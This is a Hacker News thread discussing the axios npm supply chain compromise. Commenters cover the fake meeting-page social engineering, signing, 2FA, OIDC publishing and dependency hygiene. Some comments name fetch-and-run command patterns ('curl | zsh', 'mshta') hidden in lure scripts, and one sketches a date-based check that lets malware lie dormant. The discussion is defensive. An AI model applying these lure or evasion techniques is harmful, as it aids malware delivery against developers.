Post Mortem: axios NPM supply chain compromise

(github.com)

285 points | by JeanMeche 4 days ago ago

161 comments

  • Zopieux 3 days ago ago

    Not much we didn't know (you're basically SOL since an owner was compromised), however we now have a small peek into the actual meat of the social engineering, which is the only interesting news imho: https://github.com/axios/axios/issues/10636#issuecomment-418...

    • hatmanstack 3 days ago ago

      jasonsaayman and voxpelli had useful write ups from the "head on a swivel" perspective of what to watch out for. Jason mentioned "the meeting said something on my system was out of date." they were using Microsoft meeting and that's how they got RCE. Would love more color on that.

      • NewEntryHN 2 days ago ago

        He says it mimicks what is described here: https://cloud.google.com/blog/topics/threat-intelligence/unc...

        Which is basically phishing:

        > The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor's infrastructure, zoom[.]uswe05[.]us.

        > Once in the "meeting," the fake video call facilitated a ruse that gave the impression to the end user that they were experiencing audio issues.

        > The recovered web page provided two sets of commands to be run for "troubleshooting": one for macOS systems, and one for Windows systems. Embedded within the string of commands was a single command that initiated the infection chain.

      • pas 3 days ago ago

        they are cloning Zoom and MS Teams, and try to get people to either copy a script (which is in a textarea that's conveniently too small to show the whole script, and scrollbars are hidden by CSS, and there's a copy button, and when you paste it into the terminal you'll see last few lines, also look innocent, but there's a curl | zsh or `mshta` somewhere in there), download and run a binary/.dmg (and it might be even signed by GoogIe LLC. - the name chosen to look good in the usual typeface used on macOS).

        ...

        it seems the correct muscle memory response to train into people is that "if some meeting link someone sent you doesn't work, then you should create one and send them the link"

        (and of course never download and execute anything, don't copy scripts into terminals, but it seems even veteran maintainers do this, etc...)

        see Infection Chain here https://cloud.google.com/blog/topics/threat-intelligence/unc...

        textarea at the bottom of this comment: https://github.com/axios/axios/issues/10636#issuecomment-418...

        • ajross 3 days ago ago

          > it seems the correct muscle memory response [is something other than] never download and execute anything

          Arrgh. You're looking at the closest thing to a root cause and you're just waving over it. The culture of "just paste this script" is the problem here. People trained not to do this (or, like me, old enough to be horrified about it and refuse on principle) aren't vulnerable. But you just... give up on that and instead view this as a problem with "muscle memory" about chat etiquette?

          Good grief, folks. At best that's security theater.

          FWIW, there's also a root-er cause about where this culture came from. And that's 100% down to Apple Computer's congenital hatred of open source and refusal to provide or even bless a secure package management system for their OS. People do this because there's no feasible alternative on a mac, and people love macs more than they love security it seems.

          • nozzlegear 2 days ago ago

            > FWIW, there's also a root-er cause about where this culture came from. And that's 100% down to Apple Computer's congenital hatred of open source and refusal to provide or even bless a secure package management system for their OS. People do this because there's no feasible alternative on a mac, and people love macs more than they love security it seems.

            I don't understand. I used Linux for a long time before I switched to Mac, and the "copy this command and paste it in your terminal" trope was just as prevalent there.

            • darkwater 2 days ago ago

              Most of the copy-paste Linux command used to be 'sudo aptitude install -y blahblah'. It is worth noting though that Ubuntu's PPAs became at some point widespread enough to have pasting a new repo source as a standard practice as well (which would open the way to this kind of attack for sure)

            • ajross 2 days ago ago

              It's really not, and to the extent it is it's an echo of the nonsense filtering from elsewhere. Linux distros went decades without this kind of thing by packaging the popular stuff securely. People who wanted the source knew how to get it. The "just copy this command" nonsense absolutely came from OS X first.

              • dj_mc_merlin 2 days ago ago

                Arch has pacman and that worked so well that it had to have AUR which is just glorified curl | bash. Linux distros managed it for decades when the vast majority of binaries you would run are made by nerds for nerds. If the original maintainer isn't willing to securely package it then you're often SOL.

                • ajross 2 days ago ago

                  AUR (also PPA which another comment cited) is emphatically not the same as "just run this script". If anything, and at worst, it's analogous to NPM: it's an unverified repository where the package is run at the whim of the author, and it leaves you subject to attacks against or by that author.

                  You still, however, know that the author is who they say they are, and that other people (the distro maintainers) believe that author to be the correct entity, and believe them to have been uncompromised. And any such compromise would, by definition, affect all users of the repo and presumably be detected by them and not by you in the overwhelmingly common case.

                  "Just run this script" short circuits all of that. YOU, PERSONALLY, ALONE have to do all the auditing and validation. Is the link legit? Did it come from the right place? Is it doing something weird? Was the sender compromised? There's no help. It's all on you. Godspeed.

                  • dj_mc_merlin 2 days ago ago

                    > You still, however, know that the author is who they say they are

                    This doesn't mean anything since "who they say they are" is an anonymous username with no real life correlation. Might as well be completely anonymous.

                    > that other people (the distro maintainers) believe that author to be the correct entity

                    No? Anyone can make an account and upload to AUR and it has exactly 0% to do with the distro maintainers. Packages can be removed if they're malicious, but websites can also be removed via browser-controlled blacklists (which I don't like btw but it's how it works nowadays).

                    > And any such compromise would, by definition, affect all users of the repo and presumably be detected by them and not by you in the overwhelmingly common case.

                    This is true of a popular website that advertises install instructions using curl | bash as well.

                    I've been using Linux for the past 2 decades and my general experience is that it is in no way more secure than Windows or Mac, just way less popular and with a more tech savvy userbase.

                    • ajross 2 days ago ago

                      > This doesn't mean anything since "who they say they are" is an anonymous username with no real life correlation.

                      No, that's affirmatively incorrect. AUR and PPA both require authenticated accounts. The "real life correlation" may be anonymous to you, but it is trackable in a practical sense. And more importantly, it's stable: if someone pushes an attack to AUR (or NPM, whatever) the system shuts it down quickly.

                      And the proof is THAT IS EXACTLY WHAT HAPPENED HERE. NPM noticed the Axios compromise before you did, right? QED. NPM (and AUR et. al.) are providing herd protection that the script-paste hole does not.

                      Those scripts you insist on running simply don't provide that protection. The only reason you haven't been compromised is because you aren't important enough for anyone to care. The second you get maintainership over a valuable piece of software, you will be hacked. Because you've trained yourself to be vulnerable and (especially!) becuase you've demonstrated your softness to the internet by engaging in this silly argument.

                      • dj_mc_merlin 2 days ago ago

                        [flagged]

                        • ajross 2 days ago ago

                          ... you were the one who replied to me.

                          And, you were wrong, so I said so. Indeed this is a very frustrating site to post incorrect points. It's like ground zero for Cunningham's Law study cases.

                          • dj_mc_merlin 2 days ago ago

                            Are you happy? Ignoring everything else that's been said, I truly mean this: are you happy with the person you are?

                            • ajross 2 days ago ago

                              Again, I'm really not understanding your offense here. You came to me to disagree with something I posted. And as it happened you were wrong. I told you so, and you dug in twice with more incorrect takes. That's just... discussion. And frankly pretty polite discussion even by the standards of this site (which is pretty polite!).

                              There's no etiquette that demands I not tell you you're wrong.

      • Hamuko 2 days ago ago

        Makes me glad that I've only ever used my iPad whenever I've had to interview through Microsoft Teams.

        • rk06 2 days ago ago

          this is literally the lesson i take from this. always do meetings on tablets

      • denalii 3 days ago ago

        Other comment already said, but it seems it was likely a clone of the web interface rather than the actual teams client. You can see a lot more details in this comment on the github thread (not by the axios maintainer, but goes over the same threat group and campaign) https://github.com/axios/axios/issues/10636#issuecomment-418...

    • lrvick 3 days ago ago

      An owner being compromised is absolutely survivable on a responsibly run FOSS project with proper commit/review/push signing.

      This and every other recent supply chain attack was completely preventable.

      So much so I am very comfortable victim blaming at this point.

      This is absolutely on the Axios team.

      Go setup some smartcards for signing git push/commit and publish those keys widely, and mandate signed merge commits so nothing lands on main without two maintainer sigs, and no more single points of failure.

      • fortuitous-frog 3 days ago ago

        Did you investigate the maintainer compromise and publication path? The malicious version was never committed or pushed via git. The maintainer signs his commits, and v1 releases were using OIDC and provenance attestations. The malicious package versions were published locally using the npm cli after the maintainer's machine was compromised via a RAT; there's no way for package maintainers to disable/forbid local publication on npmjs.

        It seems the Axios team was largely practicing what you're preaching. To the extent they aren't: it still wouldn't have prevented this compromise.

        • lrvick 3 days ago ago

          I can not find a single signed recent commit on the axios repo. It is totally yolo mode. Those "signed by github" signatures are meaningless. I stand by my comment in full.

          One must sign commits -universally- and -also- sign reviews/merges (multi-party) and then -also- do multi party signing on releases. Doing only one step of basic supply chain security unfortunately buys you about as much defense as locking only a single door.

          I do however certainly assign significant blame to the NPM team though for repeatedly refusing optional package signing support so packages with signing enabled can be refused at the server and client if unsigned by a quorum of pinned keys, but even aside from that if packages were signed manually then canary tools could have detected this immediately.

          • dns_snek 3 days ago ago

            What you sign or don't sign in your Git repo doesn't matter because NPM doesn't publish from a Git repo. Signing commits is still useful for your contributors and downstream forks but it won't have any effect on the users who use your package via NPM.

            I think NPM is fully to blame here. Packages that exceed a certain level of popularity should require signing/strong 2FA. They should implement more schemes that publishers can optionally enable, like requiring mandatory sign-off from more than 1 maintainer before the package is available to download.

            Then on the package page it should say: "[Warning] Weak publishing protection" or "[Checkmark] This package requires sign-off from accountA and accountB to publish".

            • pas 3 days ago ago

              2FA was mandated by npm

              they had 2FA, but likely software TOTP (so it was either autofilled via 1password (or similar), or they were able to steal the seed)

              at this point I think publishing an npm app and asking people to scan a QR with it is the easiest way (so people don't end up with 1 actual factor)

              • lrvick 3 days ago ago

                What they need to mandate is hardware anchored passkeys/fido2/webauthn for both auth and package signing, with the -option- to sign with PGP for those that have well trusted PGP keys.

                They won't do this, I have talked to them plenty of times about it. But, if they did, the supply chain attacks would almost entirely stop.

                • zarzavat 2 days ago ago

                  Don't need to require hardware 2fa tokens. Just a mobile app would be sufficient. Publish to a staging area then require confirmation on mobile to make it go live. Maybe include a diff of changes files for good measure.

                  • patrakov a day ago ago

                    And even a mobile app (or, in fact, any single-person 2FA) would be unnecessary if we had a requirement for another live person to approve the release. As a bonus, a two-maintainers-required setup would also improve resilience against one of them going rogue or getting tortured.

              • 3 days ago ago
                [deleted]
              • HumanOstrich 3 days ago ago

                So you think the answer is replacing a requirement for a 6-digit 2FA code that can be typed into the npm publishing CLI with a requirement for a device that has a camera that can scan a QR code and then... what? What does the QR code do on the device? How does the npm CLI present the QR code?

                • lrvick 3 days ago ago

                  Simply supporting passkeys gives people domain locked login via qr/phone, or any fido2 usb device. No more keyboard entry required for login other than username, which means phishing is off the table. Standards are great if we can get anyone to use them.

            • lrvick 3 days ago ago

              Like I said. One must sign commits -universally- and -also- sign reviews/merges (multi-party) and then -also- do multi party signing on releases. The code in the release must match the code from git, or no publish.

              Until NPM can enforce those basic checks though, you have to roll your own CI to do it yourself, but large well funded widely used projects have an obligation to do the basics to protect their users, and their own reputations, from impersonation.

              • dns_snek 2 days ago ago

                I agree, I just think it's pointless to discuss Axios' commit-signing practices or lack thereof when NPM doesn't support any of it. It seems like axios was already using Trusted Publishing [1] and it still didn't get caught.

                You said that you "also" blame NPM, but they're the only party who should get any blame until they get their shit together.

                [1] https://github.com/axios/axios/issues/10636#issuecomment-418...

        • vaginaphobic 3 days ago ago

          [dead]

      • TheTaytay 3 days ago ago

        It wasn’t done through git. It was a direct npm publish from the compromised machine. If you read further down in the comments (https://github.com/axios/axios/issues/10636#issuecomment-418...), it seems difficult to pick the right npm settings to prevent this attack.

        If I understand it correctly, your suggestions wouldn’t have prevented it, which is evidence that this is not as trivially fixable as you believe it is.

        • lrvick 3 days ago ago

          To prevent supply chain attacks you need multi party cryptographic attestation at every layer, which is pretty straight forward, but you are correct, NPM and GitHub controls absolutely will not save you. Microsoft insists their centralized approach can work, but we have plenty of evidence it does not.

          Operate under the assumption all accounts will be taken over because centralized corporate auth systems are fundamentally vulnerable.

          This is how you actually fix it:

          1. Every commit must be signed by a maintainer key listed in the MAINTAINERS file or similar

          2. Every review/merge must be signed by a -second- maintainer key

          3. Every artifact must be build deterministically and be signed by multiple maintainers.

          4. Have only one online npm publish key maintained in a deterministic and remotely attestable enclave that validates multiple valid maintainer signatures

          5. Automatically sound the alarm if an NPM release is pushed any other way, and automatically revoke it.

          • charcircuit 3 days ago ago

            And for 5 there should be help on the NPM end to make it so that the alarms can fire before the new update is actually revealed to the public. There could be a short staging time where it could be revoked before any harm has been done. During this staging time NPM should also scan the package through a malware scanner before allowing it to go public.

            • lrvick 3 days ago ago

              I agree that would be nice, but NPM absolutely will not do any basic supply chain integrity work. They are actively opposed to it citing concerns that it might turn off lower skill developers that would be too annoyed by tapping a yubikey to sign releases or code. I have talked to them enough times over the years to have completely given up here.

              Whats even more stupid is they actually started mandating 2FA for high risk packages, and FIDO2 supports being used to actually sign artifacts, but they instead simply use it for auth, and let releases stay unsigned. Even the developers they insisted hold cryptographic signing keys, they insist on only throw-away signatures for auth, but not using them for artifact signing to prevent impersonation. It is golf clap level stupid.

              Consider them a CDN that wants to analyze your code for AI training for their employer and nothing more. Any security controls that might restrict the flow of publishing even a little bit will be rejected.

              • 2 days ago ago
                [deleted]
      • patrakov a day ago ago

        The "nothing gets on main without two signatures" rule would not have prevented the xz story, where a comaintainer was able to smuggle malicious code past the review as "binary data for new tests" and, effectively, get it signed.

      • Zopieux 3 days ago ago

        This only works up to a point. Some human needs some way of changing the publication setup in case something goes wrong or changes. What you're asking is blowing a proverbial e-fuse once the setup is known to be working. This is software, shit will go wrong at some point and you need a way to make changes.

        • lrvick 3 days ago ago

          Of course, which is why all the (decent) tooling for this is provider agnostic, and provides documentation for multi-party-sharded backups so a quorum of maintainers can always re-assemble the key by hand for any reason if needed.

  • falkensmaize 2 days ago ago

    The fetch api has been widely available in browsers for a decade now. And in node since 18. A competent developer could whip up a more axios-like library with fetch in a day easily. You can do all the cool things like interceptors with fetch too.

    Yet most developers I work with just use it reflexively. This seems like one of the biggest issues with the npm ecosystem - the complete lack of motivation to write even trivial things yourself.

    • neya 2 days ago ago

      > A competent developer could whip up a more axios-like library with fetch in a day easily.

      Then you would have created just an axios clone. AKA re-inventing the wheel. The issue isn't the library itself, but rather the fact that it's popular and provided a large enough attack surface.

      You can actually just clone the axios package and use it as is from your private repo and you would not have been affected.

      • darepublic 2 days ago ago

        You would have created a smaller axios that only does what you needed it to. Even better

        • neya 5 hours ago ago

          Absolutely.

      • bensyverson 2 days ago ago

        I think we're entering an era where "re-inventing the wheel" is actually a completely valid defensive posture. The cost is so low relative to the reduction in risk.

      • littlestymaar 2 days ago ago

        > AKA re-inventing the wheel.

        The wheel is the native fetch API, nobody needs to reinvent it.

        All you'd do in that scenario is make your own hubcap to put on top.

    • kro 2 days ago ago

      I really don't get this either, I've always removed axios when it was preinstalled in a framework.

      I use "xhr" via fetch extensively, it can do everything in day to day business for years with minimal boilerplate.

      (The only exception known to me being upload progress/status indication)

    • port11 2 days ago ago

      Axios really does a lot of other great things. I would argue that Fetch could’ve easily been Axios-lite. Axios handles errors better, has interceptors, parses JSON for you, etc.

      The multiple supply chain attacks against NPM packages would, of course, be solved if we simply stop using third-party libraries.

      • falkensmaize a day ago ago

        I guess the point I’m making is that a lot of popular JavaScript libraries were created to address deficiencies in the core api that don’t exist anymore, but we keep using these libraries mostly because of entropy and familiarity.

      • schindlabua a day ago ago

        parse json?

        const x = await fetch(...); await x.json();

        "intercept" code that runs before every request?

        const withAuth = (res, options) => fetch(res, { ... do stuff here });

    • agumonkey 2 days ago ago

      Maybe people are too comfy with axios base path url and interceptor api ? or maybe fetch handles that as well ? (through a shim ?)

    • timcobb 2 days ago ago

      Fetch can't do a lot of table stakes stuff...

      • paustint 2 days ago ago

        Ok, well have AI write some table stakes for you in 10 minutes with 100% test coverage and only provide exactly what "table stakes" you are missing without any bells and whistles.

      • dkdbejwi383 2 days ago ago

        Such as?

  • robshippr 3 days ago ago

    The interesting detail from this thread is that every legitimate v1 release had OIDC provenance attestations and the malicious one didn't, but nobody checks. Even simpler, if you're diffing your lockfile between deploys, a brand new dependency appearing in a patch release is a pretty obvious red flag.

    • GCUMstlyHarmls 3 days ago ago

      To be honest, I would have assumed the tooling would do attestation verification for me. The diffing the lockfile would be on me though.

    • clawfund 3 days ago ago

      npm could solve half of this by letting packages opt into OIDC-only publishing at the registry level. v1 already had provenance attestations but the registry happily accepted the malicious publish without them.

    • seanmarshall 2 days ago ago

      [flagged]

  • anematode 3 days ago ago

    Looks like a very sophisticated operation, and I feel for the maintainer who had his machine compromised.

    The next incarnation of this, I worry, is that the malware hibernates somehow (e.g., if (Date.now() < 1776188434046) { exit(); }) to maximize the damage.

    • ffsm8 3 days ago ago

      Isn't that already how it is?

      I mean the compromised machine registers itself on the command server and occasionally checks for workloads.

      The hacker then decides his next actions - depending on the machine they compromised they'll either try to spread (like this time) and make a broad attack or they may go more in-depth and try to exfiltrate data/spread internally if eg a build node has been compromised

  • fraywing 4 days ago ago

    Incredible uptick in supply chain attacks over the last few weeks.

    I feel like npm specifically needs to up their game on SA of malicious code embedded in public projects.

    • simulator5g 4 days ago ago

      That's the reality of modern war. Many countries are likely planting malware on a wide scale. You can't even really prove where an attack originated from, so uninvolved countries would also be smart to take advantage of the current conflict. Like if you primarily wrote German, you would translate your malware to Chinese, Farsi, English, or Hebrew, and take other steps to make it appear to come from one of those warring countries. Any country who was making a long term plan involving malware would likely do it around this time.

      • altmanaltman 3 days ago ago

        You can write code in Chinese and Farsi?

        • simulator5g 2 days ago ago

          Yes and there have been documented cases of translated malware. Sometimes its done a little sloppily and there is other evidence that points to the origin being in another country that doesn't speak the language its written in. But even then, you can't really prove they didn't just use a residential VPN or whatever.

        • axitanull 3 days ago ago

          You can deliberately put comments and descriptions using those language.

    • dgellow 3 days ago ago

      npm process to setup OIDC is way too frustrating. There is just so much friction. You need the package to first exists in the registry, meaning you have to first create an API token and push something. And only then can you enable OIDC for that specific package. After adding the repo + workflow names, you have to save. Then finally toggle the “only allow OIDC publishing”.

      Before each action you need to enter your 2fa code.

      I got so frustrated with npm end of last year that I wrote a whole guide covering that issue: https://npmdigest.com/guides/npm-trusted-publishing

    • ipnon 4 days ago ago

      NPM is designed to let you run untrusted code on your machine. It will never work. There is no game to step up. It's like asking an ostrich to start flying.

      • dcrazy 3 days ago ago

        It’s far from a complete solution, but to mitigate this specific avenue of supply chain compromise, couldn’t Github/npm issue single-purpose physical hardware tokens and allow projects (or even mandate, for the most popular ones) maintainers use these hardware tokens as a form of 2FA?

        • yjftsjthsd-h 3 days ago ago

          What would a physical token give you that totp doesn't?

          Edit: wait, did the attacker intercept the totp code as it was entered? Trying to make sense of the thread

          • dcrazy 3 days ago ago

            The attacker installed a RAT on the contributor’s machine, so if they had configured TOTP or saved the recovery codes anywhere on that machine, the attacker could defeat 2FA.

            • yjftsjthsd-h 3 days ago ago

              Oh, yes, I missed that the TOTP machine was compromised:\ Would that then imply that it would have been okay if codes came from a separate device, eg. a TOTP app on a Palm OS device with zero network connectivity? (Or maybe these days the easiest airgapped option is an old android phone that stays in airplane mode...)

              • dcrazy 3 days ago ago

                The easiest approach is a provider-issued hardware dongle like a SecurID or Yubikey. Lack of end-user programmability is a feature, not a bug.

                • yjftsjthsd-h 3 days ago ago

                  > Lack of end-user programmability is a feature, not a bug.

                  I would argue that the problem is network accessibility, not programmability.

                  • dcrazy 3 days ago ago

                    When designing a system for secure attestation, end-user programmability is not a feature.

                    It would not be an advantage for your front door lock to be infinitely reprogrammable. It’s just a liability.

                    • yjftsjthsd-h 3 days ago ago

                      I mean, I guess attestation might have some value, but it feels like moving the goalposts. Under the threat model of a remote attacker who can compromise a normal networked computer, I can't think of an attack that would succeed with a programmable TOTP code generator that would fail if that code generator was not reprogrammable. Can you?

                      > It would not be an advantage for your front door lock to be infinitely reprogrammable. It’s just a liability.

                      Er, most door locks are infinitely reprogrammable, because being able to rekey them without having to replace the whole unit is a huge advantage and the liability/disadvantage is minimal (falling under "It rather involved being on the other side of this airtight hatchway" in an unusually almost-literal sense where you have to be inside the house in order to rekey the lock, at which point you could also do anything else).

                      • dcrazy 3 days ago ago

                        Sorry, attestation is the goalpost. The community wants certainty that the package was published by a human with authority, and not just by someone who had access to an authority’s private keys. That is what distinguishes attestation from authentication or authorization.

              • nurettin 3 days ago ago

                Yes, unfortunately authenticator apps just generate TOTP codes based on a binary key sitting in plain sight without any encryption. Not that it would help if the encrypting/decrypting machine is pwned.

      • lrvick 3 days ago ago

        All maintainers need to do is code signing. This is a solved problem but the NPM team has been actively rejecting optional signing support for over a decade now. Even so maintainers could sign their commits anyway, but most are too lazy to spend a few minutes to prevent themselves from being impersonated.

        • yawaramin 3 days ago ago

          If the solution is 'maintainers just need to do xyz', then it's not a solution, sorry. It's not scalable and which projects become 'successful' and which maintainers accidentally become critical parts of worldwide codebases, is almost pure chance. You will never be able to get all the maintainers you need to 'just' do xyz. Just like you will never be able to get humans to 'just' stop making mistakes. So you had better start looking for a solution that doesn't rely on humans not making mistakes.

          • jiggawatts 3 days ago ago

            "Discipline doesn't scale" as become one of my favourite quotes for a reason.

          • lrvick 3 days ago ago

            It scales just fine for thousands of maintainers of thousands of packages for every major linux distribution that powers the internet. You just have to automate enforcement so people do not have a choice.

            Are you really saying there is just something fundamental about javascript developers that makes them unable to run the same basic shell commands as Linux distribution maintainers?

            • yawaramin 2 days ago ago

              No, it really doesn't scale that well. 'Thousands' of packages is laughable compared to the scale of npm. And even at the 'thousands' scale distros are often laughably out of date because they're so slow to update their packages.

              You are of course right that a signed package ecosystem would be great, it's just that you're asking people to do this labour for you for free. If you pay some third party to verify and sign packages for you? That's totally fine. Asking maintainers already under tremendous pressure to do yet another labour-intensive security task so you can benefit for free? That's out of balance.

              Are they incapable of doing it? Probably not. Does it take real labour and effort to do it? Absolutely.

              • lrvick 2 days ago ago

                My 7 teammates and I on stagex actually maintain all this zero-trust signing and release process I am suggesting for several hundred packages and counting. Not asking anyone to do hundreds like my team and I are, but if authors could just at least do the bare minimum for the code they directly author that would eliminate the last gaping hole in the supply chain.

        • woodruffw 2 days ago ago

          With what keys, and how do you propose establishing trust in those keys?

          (As we’ve seen from every GPG topology outside of the kinds of small trusted rings used by Linux distros and similar, there’s no obvious, trustworthy, scalable way to do decentralized key distribution.)

          • lrvick 2 days ago ago

            If the keys that signed the early commits of a trusted FOSS project suddenly change without being signed by the previous keys, that should merit a higher level of consensus at release time, or waiting periods, etc.

            Identity continuity at a minimum, is of immense defensive value even though we will not know if the author is human or trusted by any humans.

            That said any keys that become attached to projects that are highly depended on would earn a lot of trust that they are human by getting a couple of the 5k+ of people worldwide with active well trusted PGP keys to sign theirs via conferences or otherwise, as it has always been.

            • woodruffw 2 days ago ago

              > If the keys that signed the early commits of a trusted FOSS project suddenly change without being signed by the previous keys, that should merit a higher level of consensus at release time, or waiting periods, etc.

              Two immediate problems: (1) package distribution has nothing to do with git (you don’t need to use any source control to publish a package on most indices, and that probably isn’t going to change), and (2) this doesn’t easily account for expiry, revocation, or the more basal reality that most people just aren’t good at key management. I think a workable design can’t make these assumptions.

              > That said any keys that become attached to projects that are highly depended on would earn a lot of trust that they are human by getting a couple of the 5k+ of people worldwide with active well trusted PGP keys to sign theirs via conferences or otherwise, as it has always been.

              This doesn’t scale to graphs of hundreds of thousands of maintainers, like PyPI has. I’m also not convinced it’s ever really worked on smaller scales either, except it in the less useful “nerd cred” sense.

              • lrvick 8 hours ago ago

                > (1) package distribution has nothing to do with git

                It does in stagex, and could in any project. The same maintainer keys that sign commits and reviews are the same keys that must sign releases.

                > (2) this doesn’t easily account for expiry, revocation, or the more basal reality that most people just aren’t good at key management. I think a workable design can’t make these assumptions.

                I do not accept this excuse. People keep up with passports and birth certificates and you are generally not allowed to have backups of those. I for one am not going to assume that most programmers are incapable of writing down 24 english words on paper on as many backups as the need and being able to recover at least one of those in the future if needed to recover a key.

                If a developer really cannot keep track of something so trivial, I absolutely do not trust them not to get their identity stolen by someone seeking to push a supply chain attack

                > This doesn’t scale to graphs of hundreds of thousands of maintainers, like PyPI has. I’m also not convinced it’s ever really worked on smaller scales either, except it in the less useful “nerd cred” sense.

                Say that to the 5444 PGP keys in the current web of trust that signs and maintains most packages for every major linux distribution running the bulk of the services on the internet. It works just fine.

                Simply make it a hard requirement for popular dependencies and developers that cannot figure out how to type 2 commands to generate a key and put it on a smartcard, and write down a 24 word backup, should not be maintainers,

                That may sound harsh, but being a maintainer of popular FOSS means an obligation to do the bare minimum to not get your identity stolen, like signing code and releases.

                Last century doctors all balked at the idea of washing hands or tools between patients even though it provably resulted in better health outcomes on average.

                "But look, everyone is negligent, and they are not likely to change" is not an excuse to not adopt obvious massive harm reduction with little effort.

                My team and I practice everything I am preaching here and any responsible project can do the same to protect their projects even if the majority ignorantly do not.

        • GandalfHN 2 days ago ago

          [flagged]

        • GandalfHN 2 days ago ago

          [flagged]

      • pas 3 days ago ago

        code becomes trusted by review, but these crowd sourcing efforts to do so fizzled out, so in practice we have weak proxies like number of downloads

        the implicit trust we have in maintainers is easily faked as we see

  • Xentyon 2 days ago ago

    This is why I've moved to native fetch for most projects. The fewer dependencies in the chain, the smaller the attack surface. For API clients especially, fetch + a thin wrapper is usually enough.

  • akersten 3 days ago ago

    Any good payload analysis been published yet? Really curious if this was just a one and done info stealer or if it potentially could have clawed its way deeper into affected systems.

  • uticus 4 days ago ago

    > March 31, around 01:00 UTC: community members file issues reporting the compromise. The attacker deletes them using the compromised account.

    Interesting it got caught when it did.

  • eviks 3 days ago ago

    > something on my system was out of date. i installed the missing item

    Given the "extreme vigilance" of the primitive "don't install unknown something on your machine" level is unattainable, can there really be an effective project-level solutions?

    Mandatory involvement of more people to hope not everyone installs random stuff, at least not at same time? (though you might not even have more people...)

  • pianopatrick 3 days ago ago

    Seems to me the root of the problem was that the guy was using the same device for all sorts of stuff.

    Seems to me that one drastic tactic NPM could employ to prevent attacks like this is to use hardware security. NPM could procure and configure laptops with identity rooted in the laptop TPM instead of 2FA. Configure the NPM servers so that for certain repos only updates signed with the private key in the laptop TPM can be pushed to NPM. Each high profile repo would have certain laptops that can upload for that repo. Set up the laptop with a minimal version of Linux with just the command line tools to upload to NPM, not even a browser or desktop environment. Give those laptops to maintainers of high profile repos for free to use for updates.

    Then at update time, the maintainer just transfers the code from their dev machine to the secure laptop via USB drive or CD and pushes to NPM from the special laptop.

    • pas 3 days ago ago

      they can simply make an app that requires tapping a button, so people don't end up with TOTP seeds stored in their password manager on the same notebook where they run 'publish' from

  • Chyzwar 2 days ago ago

    NPM should fix this mess.

    Adding postinstall should require approval from NPM. NPM clients should not install freshly published packages. NPM packages should be scanned after publishing. High profile packages should verify upstream git hash signature. NPM install should run in sandbox and detect any attempt to install outside project directory.

    But npm being part of multi trillion company cannot be bothered to fix any of these. Instead they push for tighter integration with GitHub with UX that suck.

    • cromka 2 days ago ago

      > NPM clients should not install freshly published packages.

      That would be a beautiful example of Cobra effect: what about updates that fix vulnerabilities? You're gonna force users to wait couple days or a week before they can get malware removed?

      • mcintyre1994 2 days ago ago

        In cases like this that isn’t an issue, NPM takes the malicious package down and you roll back to the previous version.

        The problem would be new versions that fix security issues though, and because this is all open source as soon as you publish the fix everyone knows the vulnerability. You wouldn’t want everyone to stay on the insecure version with a basically public vulnerability for a week.

        • cromka 2 days ago ago

          Precisely my point.

      • Chyzwar 2 days ago ago

        This could be controlled by npm. Client ask for available versions anyway. If package is security fix then it can be made available instantly. But this delay gives time for security scanners and time to notify maintainers that package was published.

        • mcintyre1994 2 days ago ago

          Then the malicious packages would always be published as a security fix.

    • mememememememo 2 days ago ago

      Just ban postinstall.

  • aeneas_ory 3 days ago ago

    Check if your machine was affected with this tool: https://github.com/aeneasr/was-i-axios-pwned

    • zwarag 3 days ago ago

      How do we know this is not the next tool in line to compromise a machine?

  • charcircuit 4 days ago ago

    Does OIDC flow block this same issue of being able to use a RAT to publish a malicious package?

    • hsbauauvhabzb 3 days ago ago

      No, once the computer is compromised nothing really helps assuming the attacker is patient enough.

    • fortuitous-frog 3 days ago ago

      No. axios (v1 at least; not v0) were setup to publish via OIDC, but there's no option on npmjs for package maintainers to restrict their package to *only* using OIDC. The maintainer says his machine was infected via RAT, so if he was using software-based 2FA, nothing could have prevented this.

      • dgellow 3 days ago ago

        Actually there is an option to restrict to only OIDC publishing. It is a bit hidden and relies on a different form for reasons I really cannot understand. Npm UX is just so bad.

        Point 4 from https://npmdigest.com/guides/npm-trusted-publishing#ux-probl...

        (I wrote that guide page for myself because I always get annoyed when dealing with npm OIDC)

    • mcintyre1994 3 days ago ago

      Nope, the most restrictive option available is to disallow tokens and require 2FA. I think that using exclusively hardware 2FA and not having the backup codes on the compromised machine probably would have prevented this attack though.

      • pepve 3 days ago ago

        Someone in the linked Github thread describes an attack where the attackers waited for the victim to use their Yubikey for an AWS login, giving the attackers access to AWS as well. I don't think hardware 2FA is safe against a RAT.

        • the8472 2 days ago ago

          Logins are session-based. You could tie publishing of a package to a signature from the key, then 1 tap = 1 package hash. But yeah, if the system is compromised and the attacker is doing interactive attacks they can wait for something that requires using the key and then trigger the publishing and win a race against the real prompt. To the user it might just appear like having to tap twice.

  • nurettin 3 days ago ago

    I never understood why all the CAS tutorials pushed axios. This was before vite and build-scripts was how you did react. After the compromise I reviewed some projects and converted them to pure JS fetch and vite.

    • pas 3 days ago ago

      what's CAS?

      • nurettin 2 days ago ago

        oops I meant create react app, no idea how I typed cas.

  • robshippr 3 days ago ago

    The interesting detail from the GitHub thread is shaanmajid's observation that every legitimate v1 release had OIDC provenance attestations and the malicious one didn't, but nobody checks. Even simpler, if you're diffing your lockfile between deploys, a brand new dependency appearing in a patch release is a pretty obvious red flag without needing any attestation infrastructure.

  • momo_dev 3 days ago ago

    this is why i pin every dependency hash in my python projects. pip install --require-hashes with a locked requirements file catches exactly this, if the package hash changes unexpectedly the install fails. surprised this isn't the default in the npm ecosystem

    • minitech 3 days ago ago

      Npm and the other JavaScript package managers do generate and check lockfiles with hashes by default. This was a new release, not a republishing of an old version (which isn’t possible on the npm registry anyway).

      • momo_dev 3 days ago ago

        i wasn't aware npm lockfiles check hashes by default now. my concern is more about the initial install before a lockfile exists, like in CI from a fresh clone without a committed lockfile. but you're right, once the lockfile is there the hash mismatch would be caught.

  • lrvick 3 days ago ago

    I ask this on every supply chain security fail: Can we please mandate signing packages? Or at least commits?

    NPM rejected PRs to support optional signing multiple times more than a decade ago now, and this choice has not aged well.

    Anyone that cannot take 5 minutes to set up commit signing with a $40 usb smartcard to prevent impersonation has absolutely no business writing widely depended upon FOSS software.

    Normalized negligence is still negligence.

    • 4ndrewl 3 days ago ago

      Is the onus really on people who write code here? It really should be on those who choose to use this unsigned code, surely?

      • lorenzohess 3 days ago ago

        Perhaps, but if it's gotten to the point where millions of people download the unsigned code, signing should probably become required. Even reproducible builds.

        • 4ndrewl 3 days ago ago

